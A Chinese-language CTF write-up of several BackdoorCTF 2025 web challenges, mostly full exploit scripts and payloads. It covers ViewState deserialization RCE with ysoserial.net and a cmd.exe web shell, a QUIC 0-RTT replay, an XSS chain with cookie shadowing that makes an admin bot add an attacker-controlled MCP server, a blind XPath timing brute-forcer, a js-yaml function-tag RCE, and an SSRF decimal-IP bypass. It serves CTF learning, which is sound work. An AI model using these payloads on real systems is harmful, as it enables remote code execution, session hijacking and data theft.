Turker
Turker
Published on 2025-12-21 / 24 Visits
0

BackdoorCTF 2025 Writeup

BackdoorCTF 2025 Writeup

Web

.net painwork | 已解出

  1. 正常手段似乎访问不到 admin.aspx,fuzz 了一下发现访问 /%2f/admin.aspx 即可绕过鉴权
  2. HealthHandler 里完全没对 URL 做过滤,可以使用 file:// 任意读文件
  3. 我们读取 web.config 发现 MachineKey 泄露
<machineKey validation="SHA1" decryption="AES" 
    validationKey="AC4DCFDDF3BB46EC1506BD671BEE55D5666B7B0B" 
    decryptionKey="AB4298433692C6911B75665DEFA47AD09EA856BE41879334" />
  1. 这给了我们打 ViewState 反序列化的可能
  2. 题目版本是 .NET 4.8,该版本默认有类型检查,需要先用 ysoserial.net 的 ActivitySurrogateDisableTypeCheck gadget 去绕过一下。这一步回显 500 是完全正常的

Payload Gen:

ysoserial.exe -g ActivitySurrogateDisableTypeCheck -c "ignore" -p ViewState --validationalg="SHA1" --validationkey="AC4DCFDDF3BB46EC1506BD671BEE55D5666B7B0B" --decryptionalg="AES" --decryptionkey="AB4298433692C6911B75665DEFA47AD09EA856BE41879334" --apppath="/" --path="/login.aspx"
  1. 接着可以打一个简单的回显马

Payload Gen:

ysoserial.exe -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./System.dll;./System.Web.dll" -p ViewState --validationalg="SHA1" --validationkey="AC4DCFDDF3BB46EC1506BD671BEE55D5666B7B0B" --decryptionalg="AES" --decryptionkey="AB4298433692C6911B75665DEFA47AD09EA856BE41879334" --apppath="/" --path="/login.aspx"

ExploitClass.cs:

class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}
  1. 成功 RCE

Payload:

POST /login.aspx HTTP/1.1
Host: <chall_ip>
Content-Length: 16972
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=bg0jsfvngq1351zcaxntdc2p
Connection: keep-alive

cmd=dir+"c:\"&__VIEWSTATE=<Payload>

![[file-20251208162127821.png]]

Shop of life | 已解出

  1. 服务使用了 HTTP/3 QUIC,其支持 0-RTT
  2. 0-RTT 的早期数据可以被重放,可以重复 redeem 以获得余额

Exp:

import asyncio, ssl, json
from aioquic.asyncio.client import connect
from aioquic.asyncio.protocol import QuicConnectionProtocol
from aioquic.h3.connection import H3Connection, H3_ALPN
from aioquic.h3.events import HeadersReceived, DataReceived
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic import events

HOST = "104.198.24.52"
PORT = 6016
USER_ID = "Turker"   # 可自定义任意 id

class H3Client(QuicConnectionProtocol):
    def __init__(self, *a, **kw):
        super().__init__(*a, **kw)
        self.http = H3Connection(self._quic)
        self.responses = {}

    async def request(self, method, path, data=None, headers=None):
        if headers is None: headers = []
        sid = self._quic.get_next_available_stream_id(False)
        fut = asyncio.get_running_loop().create_future()
        self.responses[sid] = {"fut": fut, "headers": None, "body": bytearray(), "done": False}

        hdrs = [
            (b":method", method.encode()),
            (b":scheme", b"https"),
            (b":authority", HOST.encode()),
            (b":path", path.encode()),
        ]
        for k, v in headers:
            hdrs.append((k if isinstance(k, bytes) else str(k).encode(),
                         v if isinstance(v, bytes) else str(v).encode()))
        end = (data is None) or (len(data) == 0)
        self.http.send_headers(sid, hdrs, end_stream=end)
        if data:
            if isinstance(data, str): data = data.encode()
            self.http.send_data(sid, data, end_stream=True)
        self.transmit()
        return await fut

    def _finish(self, sid):
        info = self.responses.get(sid)
        if info and info["done"] and not info["fut"].done():
            hdr_dict = {k.decode(): v.decode() for k, v in (info["headers"] or [])}
            status = int(hdr_dict.get(":status", "0") or 0)
            info["fut"].set_result({"status": status, "headers": info["headers"], "body": bytes(info["body"])})

    def quic_event_received(self, ev):
        http_events = []
        if isinstance(ev, (events.StreamDataReceived, events.DatagramFrameReceived)):
            http_events = self.http.handle_event(ev)
        elif isinstance(ev, events.ConnectionTerminated):
            for info in self.responses.values():
                if not info["fut"].done():
                    info["fut"].set_exception(ConnectionError(ev.reason_phrase))
        for he in http_events:
            if isinstance(he, HeadersReceived):
                info = self.responses.get(he.stream_id)
                if info:
                    info["headers"] = he.headers
                    if he.stream_ended:
                        info["done"] = True
                        self._finish(he.stream_id)
            elif isinstance(he, DataReceived):
                info = self.responses.get(he.stream_id)
                if info:
                    info["body"].extend(he.data)
                    if he.stream_ended:
                        info["done"] = True
                        self._finish(he.stream_id)

async def get_session_ticket():
    cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
    cfg.verify_mode = ssl.CERT_NONE
    holder = {}
    def save(t): holder["ticket"] = t
    async with connect(HOST, PORT, configuration=cfg, create_protocol=H3Client,
                       session_ticket_handler=save) as c:
        await c.request("GET", "/")
    return holder.get("ticket")

async def redeem_once(uid):
    cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
    cfg.verify_mode = ssl.CERT_NONE
    async with connect(HOST, PORT, configuration=cfg, create_protocol=H3Client) as c:
        return await c.request("POST", "/api/redeem",
                               json.dumps({"user_id": uid}),
                               [(b"content-type", b"application/json")])

async def redeem_0rtt(ticket, uid, times):
    cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN, session_ticket=ticket)
    cfg.verify_mode = ssl.CERT_NONE
    for i in range(times):
        async with connect(HOST, PORT, configuration=cfg, create_protocol=H3Client,
                           wait_connected=False) as c:
            resp = await c.request("POST", "/api/redeem",
                                   json.dumps({"user_id": uid}),
                                   [(b"content-type", b"application/json")])
            print(f"[0-RTT #{i}] {resp['body'].decode().strip()}")

async def buy_flag(uid):
    cfg = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
    cfg.verify_mode = ssl.CERT_NONE
    async with connect(HOST, PORT, configuration=cfg, create_protocol=H3Client) as c:
        buy = await c.request("POST", "/api/buy",
                              json.dumps({"user_id": uid, "item": "flag"}),
                              [(b"content-type", b"application/json")])
        inv = await c.request("GET", f"/api/inventory?user_id={uid}")
        bal = await c.request("GET", f"/api/balance?user_id={uid}")
        flag = await c.request("GET", f"/flag?user_id={uid}")
        print("buy:", buy["body"].decode().strip())
        print("inventory:", inv["body"].decode().strip())
        print("balance:", bal["body"].decode().strip())
        print("flag:", flag["body"].decode().strip())

async def main():
    ticket = await get_session_ticket()
    if not ticket:
        raise SystemExit("无法获取 session ticket")
    print("ticket obtained, exploiting 0-RTT replays...")
    # 第一次正常 redeem 建立钱包
    await redeem_once(USER_ID)
    # 重放 0-RTT redeem 多次,每次 +100
    await redeem_0rtt(ticket, USER_ID, times=6)
    # 购买并拿 flag
    await buy_flag(USER_ID)

if __name__ == "__main__":
    asyncio.run(main())

MCP Mayhem | 已解出

  1. 我们的目标是通过恶意的 MCP 服务器拿到 flag。所以需要让 mcp_proxy 知道恶意服务器的存在。
  2. 只有 Admin 才有权限添加新的 MCP 服务器,而它是通过 Bot 模拟的。
  3. 观察发现在 /client/call 接口里,调用工具的错误信息会直接返回并通过前端的 innerHTML 渲染,有 Reflected XSS。但是这个接口位于 client.challenge.com ,而添加 MCP 服务器的逻辑位于 challenge.com ,存在跨域问题。
  4. 寻找位于 challenge.com 的利用,发现在 /registerdescription 字段没有经过任何过滤,且在 /profile 页面通过 {{ current_user.description|safe }} 渲染,有一个 Stored XSS。
  5. 所以我们首先注册账号,在 description 里写入恶意的 JS 代码,其功能是:
    1. Fetch /admin/csrf-token 获取 Token。
    2. Post /admin/mcp/add-server 添加恶意服务器。
  6. 为了让 Bot 访问到我们的 Profile 而不是自己的,我们构造一个 Payload 发给 Bot ,其功能是:
    1. 设置 Cookie: document.cookie = 'session=ATTACKER_SESSION; path=/profile; domain=challenge.com'
    2. 跳转: window.location = '/profile'
  7. 在 Cookie 冲突时,path 更长的会优先被使用,于是 Bot 访问到了我们恶意的 Profile,进而添加 MCP 服务器,获得 flag。

Exp:

import requests
import json
import random
import time
import sys
import jwt
import secrets
import base64

# Configuration
# Remote Challenge URL
WEB_URL = "http://104.198.24.52:6001"
# Remote Bot URL
BOT_URL = "http://104.198.24.52:6002"
# Evil Server URL (confirmed by user)
EVIL_SERVER_URL = "http://<YOUR_IP>"

# Host headers matching the server configuration
AUTH_HOST = "challenge.com:6001"
CLIENT_HOST = "client.challenge.com:6001"
# Internal URL used by the bot
TARGET_PROFILE_URL = "http://challenge.com:6001/profile"

def solve():
    s = requests.Session()
  
    # 1. Register Attacker on REMOTE server
    username = f"hacker_{random.randint(1000, 9999)}"
    password = "password"
    print(f"[*] Registering user: {username} on {WEB_URL}")
  
    # Use a random server name to avoid collisions/leftovers
    server_name = f"srv_{random.randint(1000, 9999)}"
  
    # Stored XSS Payload
    # This runs on /profile when bot visits it.
    # It fetches the CSRF token (using Admin's session, sent because path matches /admin)
    # Then adds the evil server using the fetched token.
  
    stored_payload = f"""
    <script>
    (async () => {{
        try {{
            // 1. Get CSRF Token
            const r1 = await fetch('/admin/csrf-token');
            if (!r1.ok) throw new Error('CSRF fetch failed');
            const d1 = await r1.json();
            const token = d1.csrf_token;
        
            // 2. Add Evil Server
            const r2 = await fetch('/admin/mcp/add-server', {{
                method: 'POST',
                headers: {{'Content-Type': 'application/json'}},
                body: JSON.stringify({{
                    csrf_token: token,
                    name: "{server_name}",
                    url: "{EVIL_SERVER_URL}"
                }})
            }});
            const t2 = await r2.text();
            console.log("Add Server Result: " + t2);
        }} catch (e) {{
            console.error(e);
        }}
    }})();
    </script>
    """
  
    reg_data = {
        "username": username,
        "password": password,
        "confirm_password": password,
        "about": stored_payload
    }
  
    try:
        r = s.post(f"{WEB_URL}/register", data=reg_data, headers={"Host": AUTH_HOST})
        if r.status_code not in [200, 302]:
            print(f"[-] Registration failed: {r.status_code} {r.text}")
            # Try login anyway? No, need description injection.
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return

    # Login to get session cookie
    s.post(f"{WEB_URL}/login", data={"username": username, "password": password}, headers={"Host": AUTH_HOST})
    attacker_cookie = s.cookies.get("session")
  
    if not attacker_cookie:
        print("[-] Failed to obtain session cookie")
        return
    
    print(f"[*] Attacker Session: {attacker_cookie}")
  
    # 2. Trigger Bot via Reflected XSS
    print("[*] Triggering Bot...")
  
    # Reflected XSS Payload:
    # Sets cookie with path=/profile (Shadowing) to override Admin cookie on that page.
    # Redirects to /profile to trigger Stored XSS.
    # Use base64 encoding to avoid quoting issues in JSON transmission to Bot.
    js_payload = f"document.cookie='session={attacker_cookie}; path=/profile; domain=challenge.com'; window.location='{TARGET_PROFILE_URL}';"
    b64_payload = base64.b64encode(js_payload.encode()).decode()
    reflected_payload = f"<img src=x onerror=eval(atob('{b64_payload}'))>"
  
    print(f"[*] Payload: {reflected_payload}")
  
    bot_data = {
        "tool": "math_alpha_add",
        "arguments": json.dumps({"a": reflected_payload, "b": 1})
    }
  
    try:
        # Ensure this hits the remote bot
        requests.post(f"{BOT_URL}/", data=bot_data)
        print("[*] Bot triggered successfully")
    except Exception as e:
        print(f"[-] Bot trigger failed: {e}")

    # 3. Wait for execution
    # Bot sleeps 3s, plus network time. We wait 30s to be safe.
    print("[*] Waiting for bot to execute payload (5s)...")
    time.sleep(5)
  
    # 4. Call Evil Tool to get Flag
    evil_tool_name = f"{server_name}_steal_flag"
    print(f"[*] Attempting to call evil tool: {evil_tool_name}")
  
    tool_call_data = {
        "tool": evil_tool_name,
        "arguments": {}
    }
  
    # Call via client endpoint using attacker session (valid user)
    r = s.post(f"{WEB_URL}/call", json=tool_call_data, headers={"Host": CLIENT_HOST})
    print(f"[*] Result Status: {r.status_code}")
    print(f"[*] Result Body: {r.text}")
  
    if "flag" in r.text or "dev{" in r.text or "{" in r.text:
        try:
            res_json = r.json()
            if "result" in res_json:
                print(f"\n[+] FLAG: {res_json['result']}")
        except:
            pass

if __name__ == "__main__":
    solve()

Trust Issues | 已解出

  1. 登录逻辑没对用户名做转义直接拼接进 XPath 查询,同时查询为真时会延时 2 秒。
  const query = `//user[username/text()='${username}']`;
  const userNode = xpath.select(query, xmlDoc)[0];

  if (userNode) {
    await new Promise(resolve => setTimeout(resolve, 2000));
  }
  1. 构造用户名 admin' and CONDITION or 'a'=' ,即可测试 CONDITION 是否为真。
  2. 爆破 admin 密码之后,/admin/create这里把用户提供的 YAML 用 yaml.load 解析,并把 '' + parsed 的结果回显。这里是允许 !!js/function 的。

Exp:

import json
import string
import sys
import time

import requests
from requests import Session


BASE_URL = "http://104.198.24.52:6014"
DEFAULT_CHARSET = string.ascii_letters + string.digits + "{}_!@#$%^&*()-=+[]:;,.?"
THRESHOLD = 1.5
MAX_LENGTH = 32


def xpath_char_literal(ch: str) -> str:
    if ch == "'":
        return '"\'"'
    return f"'{ch}'"


def timing_oracle(session: Session, base: str, condition: str, threshold: float,
                  retries: int = 3) -> bool:
    username = f"admin' and {condition} or 'a'='"
    data = {"username": username, "password": "x"}

    for attempt in range(1, retries + 1):
        start = time.time()
        try:
            session.post(f"{base}/login", data=data, timeout=10)
        except requests.RequestException:
            if attempt == retries:
                raise
            time.sleep(0.5)
            continue

        elapsed = time.time() - start
        return elapsed >= threshold

    raise RuntimeError("Oracle retries exhausted")


def brute_force_password(session: Session, base: str, max_length: int,
                         charset: str, threshold: float) -> str:
    print("[*] Determining password length...")
    length = 0
    for pos in range(1, max_length + 1):
        cond = f"string-length(password/text())>={pos}"
        if timing_oracle(session, base, cond, threshold):
            length = pos
            print(f"    length >= {pos}")
        else:
            break

    if length == 0:
        raise RuntimeError("Failed to determine password length")

    print(f"[+] Password length determined: {length}")
    print("[*] Brute forcing password characters...")
    result = []
    for pos in range(1, length + 1):
        for ch in charset:
            cond = f"substring(password/text(),{pos},1)={xpath_char_literal(ch)}"
            if timing_oracle(session, base, cond, threshold):
                result.append(ch)
                guess = "".join(result)
                print(f"    position {pos} => {ch!r} (partial: {guess})")
                sys.stdout.flush()
                break
        else:
            raise RuntimeError(f"Failed to find character at position {pos}")

    password = "".join(result)
    print(f"[+] Admin password recovered: {password}")
    return password


def login_as_admin(session: Session, base: str, password: str) -> None:
    resp = session.post(f"{base}/login", data={"username": "admin", "password": password},
                        allow_redirects=False)
    if resp.status_code != 302 or "sid=" not in resp.headers.get("Set-Cookie", ""):
        raise RuntimeError("Admin login failed")
    print("[+] Logged in as admin")


def fetch_flag(session: Session, base: str) -> str:
    file_content = """--- !!js/function >
  function () {
    const fs = process.mainModule.require('fs');
    try {
      return fs.readFileSync('/app/flag.txt', 'utf8');
    } catch (e) {
      return 'ERR:' + e.message;
    }
  }()
"""
    payload = {"filename": "exploit.yml", "fileContent": file_content}
    headers = {"Content-Type": "application/json"}
    resp = session.post(f"{base}/admin/create", headers=headers, data=json.dumps(payload))
    if resp.status_code != 200:
        raise RuntimeError(f"YAML exploit failed (status {resp.status_code})")

    data = resp.json()
    if not data.get("success"):
        raise RuntimeError(f"Server rejected payload: {data}")

    result = data.get("result", "")
    if result.startswith("ERR:"):
        raise RuntimeError(f"Exploit executed but returned error: {result}")
    print(f"[+] Flag response: {result.strip()}")
    return result.strip()


def main():
    session = requests.Session()
    password = None

    if not password:
        password = brute_force_password(session, BASE_URL, MAX_LENGTH,
                                        DEFAULT_CHARSET, THRESHOLD)

    login_as_admin(session, BASE_URL, password)
    flag = fetch_flag(session, BASE_URL)
    print(f"[+] Final flag: {flag}")


if __name__ == "__main__":
    main()

MarketFlow | 已解出

  1. ObjectManager 服务允许用户通过 JSON 数据中的 _type 字段实例化 CLASS_REGISTRY 中定义的任意类。
  2. 通过构造恶意的 ReportConfiguration 对象,我们可以利用 AnalyticsProcessor -> CacheConfiguration -> PersistenceAdapter 的链子。PersistenceAdapter 类允许我们实现任意写。
  3. TemplateRenderer 拥有一个 Legacy Mode 。如果模板文件以 .tpl 结尾并包含特定头部,渲染器会解析 @include: 指令。我们在 exploit.tpl 中写入 @include:../../../../flag ,即可读到 flag。
  4. 现在我们需要调用 /internal/cron/process 来开始这个任务的处理。可以利用 WebhookForwarder 类的 SSRF ,使用 2130706433 绕过黑名单触发内部接口。

Exp:

import requests
import json
import time
import sys

# Target Configuration
BASE_URL = "http://34.10.220.48:6002"
USERNAME = "hacker"
PASSWORD = "password123"
EMAIL = "hacker@example.com"

# Setup session
s = requests.Session()

def register():
    print("[*] Registering...")
    res = s.post(f"{BASE_URL}/api/auth/register", json={
        "username": USERNAME,
        "password": PASSWORD,
        "email": EMAIL
    })
    print(res.text)

def login():
    print("[*] Logging in...")
    res = s.post(f"{BASE_URL}/api/auth/login", json={
        "username": USERNAME,
        "password": PASSWORD
    })
    if "user_id" in res.text:
        print("[+] Logged in successfully")
        return True
    print("[-] Login failed")
    return False

def exploit():
    # Step 1: Create the malicious task
    # This task will:
    # 1. Write 'exploit.tpl' to templates directory via CacheConfiguration/PersistenceAdapter
    # 2. Render 'exploit.tpl' via TemplateSpecification (which includes the flag)
    # 3. Save the result to 'exploit_result.html'
  
    print("[*] Creating malicious task...")
  
    payload = {
        "_type": "ReportConfiguration",
        "report_type": "exploit",
        "date_range": "today",
        "processor": {
            "_type": "AnalyticsProcessor",
            "data_source": "dummy",
            "output_config": {
                "_type": "CacheConfiguration",
                "cache_key": "exploit_key",
                "ttl": 3600,
                "objects": [
                    "# -*- mode: legacy -*-",
                    "FLAG_START",
                    "@include:../../../../flag.txt",
                    "FLAG_END"
                ],
                "persistence": {
                    "_type": "PersistenceAdapter",
                    "storage_path": "../templates/exploit.tpl",
                    "mode": "write"
                }
            }
        },
        "template": {
            "_type": "TemplateSpecification",
            "template_name": "exploit.tpl",
            "output_path": "exploit_result.html"
        }
    }
  
    res = s.post(f"{BASE_URL}/api/analytics/reports", json=payload)
    print(f"Task creation response: {res.text}")
  
    # Step 2: Trigger the scheduler via SSRF
    # We use decimal IP for 127.0.0.1 to bypass checks: 2130706433
  
    print("[*] Triggering scheduler via SSRF...")
  
    forwarder_payload = {
        "_type": "WebhookForwarder",
        "target_url": "http://2130706433:5000/internal/cron/process",
        "method": "POST"
    }
  
    res = s.post(f"{BASE_URL}/api/webhooks/forward", json=forwarder_payload)
    print(f"SSRF response: {res.text}")
  
    # Step 3: Fetch the flag
    print("[*] Fetching flag...")
    time.sleep(2) # Wait for processing
  
    res = s.get(f"{BASE_URL}/reports/exploit_result.html")
    if res.status_code == 200:
        print(f"\n[+] FLAG FOUND: {res.text}")
    else:
        print(f"[-] Failed to get flag. Status: {res.status_code}")
        print(res.text)

def main():
    register()
    if login():
        exploit()

if __name__ == "__main__":
    main()


No Sight Required | 已解出

  1. sqlmap 一把梭是什么意思?